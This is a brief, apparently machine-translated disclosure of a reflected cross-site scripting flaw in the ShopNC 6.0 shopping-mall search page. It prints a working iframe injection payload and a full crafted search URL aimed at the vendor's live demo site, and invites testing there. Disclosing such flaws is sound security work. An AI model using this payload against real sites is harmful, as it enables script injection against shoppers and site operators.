ShopNC single-user XSS vulnerability and repair solution

 

 

Brief description: The most secure shopping mall system, ShopNC single user program, through the construction of a special url to achieve XSS attacks on ShopNC.

This problem exists in the latest 6.0 version!

Detailed Description: The Search. php page does not strictly filter search variables,

Execute the script submitted by the user url regardless of encoding.

For example, the Cross-Site Script is

 

<Iframe src = http://www.fengblog.org/width = 800 height = 160 frameborder = 0> </iframe>

 

 

 

 

Tests can be performed on the official demonstration site.

Http://mall.shopnc.net

 

 

 

Http://mall.shopnc.net/search.php? All_sun = all_sun & button = % e6 % 90% 9c % e7 % b4 % a2 % e7 % bb % 93% e6 % 9e % 9c & end_price = & keywords = % 27% 22% 28% 29% 251 </textarea> <iframe src = http://www.fengblog.org/width = 800 height = 160 frameborder = 0> </iframe> & sel_goods_brand = & start_price = & txt_class_top_id = 0

 

 

Vulnerability proof: all are described in detail.

Solution: Because the code is Zend encrypted, please wait for the vendor to release this issue!